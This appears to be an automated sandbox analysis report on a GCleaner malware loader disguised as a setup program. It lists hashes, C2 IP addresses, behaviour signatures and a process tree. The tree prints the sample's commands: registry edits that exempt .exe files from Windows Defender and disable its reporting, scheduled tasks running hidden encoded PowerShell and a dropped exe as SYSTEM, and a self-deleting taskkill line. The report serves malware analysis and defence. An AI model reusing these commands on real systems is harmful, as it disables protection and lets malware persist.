Analysis

  • max time kernel
    511s
  • max time network
    405s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-03-2023 18:24

General

  • Target

    setup_kNf5DvMN.exe

  • Size

    4.7MB

  • MD5

    97e1d6bc473047605f457d00caf6fba4

  • SHA1

    2fb78991c0d0a530c51cd6267ca84bafbb7ef803

  • SHA256

    aaf8fab4d6540823ea06e4d9e35291f82b263eaf612af980912795f403b83712

  • SHA512

    99aea6c186c12ffbfa96c57a5b38d6fb107da8946d5177b0ea3d52bf9b0648e65c0ee140c10d026503bcfc88cc109842a990c6801320974f4cf4b43d6d8a26bf

  • SSDEEP

    98304:ntjiPbNRFsA0Aweg23ThghzHcnxnPpJ0y8dcOtFLKTWhliJyDPFhn:pWbrFL0FegEtMLcnxnPBPscWT2y7Fhn

Malware Config

Extracted

Family

gcleaner

C2

85.31.45.39

85.31.45.250

85.31.45.251

85.31.45.88

Signatures

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks for any installed AV software in registry 1 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 28 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 48 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 39 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_kNf5DvMN.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_kNf5DvMN.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3900
    • C:\Users\Admin\AppData\Local\Temp\is-TEQN5.tmp\is-P9QC6.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-TEQN5.tmp\is-P9QC6.tmp" /SL4 $B0052 "C:\Users\Admin\AppData\Local\Temp\setup_kNf5DvMN.exe" 4602124 53248
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Windows\SysWOW64\net.exe
        "C:\Windows\system32\net.exe" helpmsg 23
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3292
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 helpmsg 23
          4⤵
            PID:728
        • C:\Program Files (x86)\ImageComparer\IC329.exe
          "C:\Program Files (x86)\ImageComparer\IC329.exe"
          3⤵
          • Executes dropped EXE
          PID:1340
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1340 -s 868
            4⤵
            • Program crash
            PID:4616
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1340 -s 888
            4⤵
            • Program crash
            PID:4400
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1340 -s 140
            4⤵
            • Program crash
            PID:1888
        • C:\Program Files (x86)\ImageComparer\IC329.exe
          "C:\Program Files (x86)\ImageComparer\IC329.exe" 5826013cd90e1950316750759f55d755
          3⤵
          • Executes dropped EXE
          • Checks for any installed AV software in registry
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2884
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 852
            4⤵
            • Program crash
            PID:1104
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 860
            4⤵
            • Program crash
            PID:4516
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 884
            4⤵
            • Program crash
            PID:2044
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1052
            4⤵
            • Program crash
            PID:2756
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1092
            4⤵
            • Program crash
            PID:2092
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1056
            4⤵
            • Program crash
            PID:4536
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1052
            4⤵
            • Program crash
            PID:3048
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1252
            4⤵
            • Program crash
            PID:2716
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1260
            4⤵
            • Program crash
            PID:3060
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1204
            4⤵
            • Program crash
            PID:1336
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 968
            4⤵
            • Program crash
            PID:216
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1244
            4⤵
            • Program crash
            PID:452
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1480
            4⤵
            • Program crash
            PID:2120
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1320
            4⤵
            • Program crash
            PID:3928
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1756
            4⤵
            • Program crash
            PID:2636
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1316
            4⤵
            • Program crash
            PID:748
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1516
            4⤵
            • Program crash
            PID:3484
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1996
            4⤵
            • Program crash
            PID:4000
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1780
            4⤵
            • Program crash
            PID:1232
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 840
            4⤵
            • Program crash
            PID:1824
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2024
            4⤵
            • Program crash
            PID:5028
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1756
            4⤵
            • Program crash
            PID:3472
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1836
            4⤵
            • Program crash
            PID:3556
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1892
            4⤵
            • Program crash
            PID:3304
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1760
            4⤵
            • Program crash
            PID:1324
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2072
            4⤵
            • Program crash
            PID:1504
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2008
            4⤵
            • Program crash
            PID:3980
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2088
            4⤵
            • Program crash
            PID:2656
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 840
            4⤵
            • Program crash
            PID:2744
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2096
            4⤵
            • Program crash
            PID:4764
          • C:\Users\Admin\AppData\Local\Temp\zw5VYyXN\8Q8Ynu6h.exe
            C:\Users\Admin\AppData\Local\Temp\zw5VYyXN\8Q8Ynu6h.exe /m SUB=5826013cd90e1950316750759f55d755
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:312
            • C:\Users\Admin\AppData\Local\Temp\is-ABNKO.tmp\is-8Q8MT.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-ABNKO.tmp\is-8Q8MT.tmp" /SL4 $160054 "C:\Users\Admin\AppData\Local\Temp\zw5VYyXN\8Q8Ynu6h.exe" 1378502 52736 /m SUB=5826013cd90e1950316750759f55d755
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:956
              • C:\Windows\SysWOW64\net.exe
                "C:\Windows\system32\net.exe" helpmsg 20
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:316
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 helpmsg 20
                  7⤵
                    PID:4616
                • C:\Users\Admin\AppData\Local\Temp\is-JJ3V3.tmp\FileDate329\FileDate329.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-JJ3V3.tmp\FileDate329\FileDate329.exe" /m SUB=5826013cd90e1950316750759f55d755
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  PID:3812
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /im "FileDate329.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-JJ3V3.tmp\FileDate329\FileDate329.exe" & exit
                    7⤵
                      PID:1720
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /im "FileDate329.exe" /f
                        8⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3736
              • C:\Users\Admin\AppData\Local\Temp\E7nawvlM\NiLRDjNG6iWIRznGxB.exe
                C:\Users\Admin\AppData\Local\Temp\E7nawvlM\NiLRDjNG6iWIRznGxB.exe /S /site_id=690689
                4⤵
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in System32 directory
                • Enumerates system info in registry
                • Suspicious use of WriteProcessMemory
                PID:4580
                • C:\Windows\SysWOW64\forfiles.exe
                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1240
                  • C:\Windows\SysWOW64\cmd.exe
                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1104
                    • \??\c:\windows\SysWOW64\reg.exe
                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                      7⤵
                        PID:5084
                      • \??\c:\windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                        7⤵
                          PID:2044
                    • C:\Windows\SysWOW64\forfiles.exe
                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4660
                      • C:\Windows\SysWOW64\cmd.exe
                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                        6⤵
                          PID:2164
                          • \??\c:\windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                            7⤵
                              PID:1552
                            • \??\c:\windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                              7⤵
                                PID:4908
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /CREATE /TN "ghgJytiJP" /SC once /ST 01:02:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            5⤵
                            • Creates scheduled task(s)
                            PID:1752
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /run /I /tn "ghgJytiJP"
                            5⤵
                              PID:4140
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /DELETE /F /TN "ghgJytiJP"
                              5⤵
                                PID:2528
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "bIIVPNBwJtQvPFWhKj" /SC once /ST 20:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\ReHoYmc.exe\" DF /site_id 690689 /S" /V1 /F
                                5⤵
                                • Drops file in Windows directory
                                • Creates scheduled task(s)
                                PID:1680
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2140
                              4⤵
                              • Program crash
                              PID:4708
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2128
                              4⤵
                              • Program crash
                              PID:4564
                            • C:\Users\Admin\AppData\Local\Temp\FMqcuseo\66mYpuDkR.exe
                              C:\Users\Admin\AppData\Local\Temp\FMqcuseo\66mYpuDkR.exe
                              4⤵
                              • Executes dropped EXE
                              PID:2124
                              • C:\Users\Admin\AppData\Local\Temp\is-TNCIS.tmp\is-CK8P0.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-TNCIS.tmp\is-CK8P0.tmp" /SL4 $302DC "C:\Users\Admin\AppData\Local\Temp\FMqcuseo\66mYpuDkR.exe" 1903931 51712
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in Program Files directory
                                PID:3840
                                • C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe
                                  "C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  PID:4716
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2136
                              4⤵
                              • Program crash
                              PID:3048
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2128
                              4⤵
                              • Program crash
                              PID:4476
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1756
                              4⤵
                              • Program crash
                              PID:4100
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1884
                              4⤵
                              • Program crash
                              PID:5056
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2052
                              4⤵
                              • Program crash
                              PID:2984
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2000
                              4⤵
                              • Program crash
                              PID:4296
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2080
                              4⤵
                              • Program crash
                              PID:632
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2132
                              4⤵
                              • Program crash
                              PID:3600
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2040
                              4⤵
                              • Program crash
                              PID:2916
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1768
                              4⤵
                              • Program crash
                              PID:2888
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 2080
                              4⤵
                              • Program crash
                              PID:5028
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1844
                              4⤵
                              • Program crash
                              PID:4612
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 140
                              4⤵
                              • Program crash
                              PID:4728
                          • C:\Windows\SysWOW64\net.exe
                            "C:\Windows\system32\net.exe" pause ImageComparer329
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4184
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 pause ImageComparer329
                              4⤵
                                PID:4876
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1340 -ip 1340
                          1⤵
                            PID:4692
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1340 -ip 1340
                            1⤵
                              PID:4048
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1340 -ip 1340
                              1⤵
                                PID:4128
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2884 -ip 2884
                                1⤵
                                  PID:3184
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2884 -ip 2884
                                  1⤵
                                    PID:5096
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2884 -ip 2884
                                    1⤵
                                      PID:4872
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2884 -ip 2884
                                      1⤵
                                        PID:1200
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2884 -ip 2884
                                        1⤵
                                          PID:4676
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2884 -ip 2884
                                          1⤵
                                            PID:3656
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2884 -ip 2884
                                            1⤵
                                              PID:4380
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2884 -ip 2884
                                              1⤵
                                                PID:1732
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2884 -ip 2884
                                                1⤵
                                                  PID:2988
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2884 -ip 2884
                                                  1⤵
                                                    PID:4736
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2884 -ip 2884
                                                    1⤵
                                                      PID:312
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2884 -ip 2884
                                                      1⤵
                                                        PID:3968
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2884 -ip 2884
                                                        1⤵
                                                          PID:4708
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2884 -ip 2884
                                                          1⤵
                                                            PID:4868
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2884 -ip 2884
                                                            1⤵
                                                              PID:1792
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2884 -ip 2884
                                                              1⤵
                                                                PID:2528
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2884 -ip 2884
                                                                1⤵
                                                                  PID:1312
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2884 -ip 2884
                                                                  1⤵
                                                                    PID:3116
                                                                  • C:\Windows\System32\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                    1⤵
                                                                      PID:2224
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2884 -ip 2884
                                                                      1⤵
                                                                        PID:3604
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2884 -ip 2884
                                                                        1⤵
                                                                          PID:1104
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2884 -ip 2884
                                                                          1⤵
                                                                            PID:4872
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2884 -ip 2884
                                                                            1⤵
                                                                              PID:2036
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2884 -ip 2884
                                                                              1⤵
                                                                                PID:4676
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2884 -ip 2884
                                                                                1⤵
                                                                                  PID:1568
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2884 -ip 2884
                                                                                  1⤵
                                                                                    PID:4308
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2884 -ip 2884
                                                                                    1⤵
                                                                                      PID:1416
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2884 -ip 2884
                                                                                      1⤵
                                                                                        PID:3904
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2884 -ip 2884
                                                                                        1⤵
                                                                                          PID:1592
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2884 -ip 2884
                                                                                          1⤵
                                                                                            PID:3232
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2884 -ip 2884
                                                                                            1⤵
                                                                                              PID:3568
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2884 -ip 2884
                                                                                              1⤵
                                                                                                PID:2576
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2884 -ip 2884
                                                                                                1⤵
                                                                                                  PID:4192
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2884 -ip 2884
                                                                                                  1⤵
                                                                                                    PID:4296
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                    1⤵
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:388
                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                      2⤵
                                                                                                        PID:4740
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2884 -ip 2884
                                                                                                      1⤵
                                                                                                        PID:4556
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                        1⤵
                                                                                                          PID:1552
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                          1⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:2164
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2884 -ip 2884
                                                                                                          1⤵
                                                                                                            PID:2148
                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                            1⤵
                                                                                                              PID:4756
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2884 -ip 2884
                                                                                                              1⤵
                                                                                                                PID:4672
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2884 -ip 2884
                                                                                                                1⤵
                                                                                                                  PID:3684
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2884 -ip 2884
                                                                                                                  1⤵
                                                                                                                    PID:5044
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2884 -ip 2884
                                                                                                                    1⤵
                                                                                                                      PID:1248
                                                                                                                    • C:\Users\Admin\Documents\setup_2.exe_id25860365.exe
                                                                                                                      "C:\Users\Admin\Documents\setup_2.exe_id25860365.exe"
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Writes to the Master Boot Record (MBR)
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:4324
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
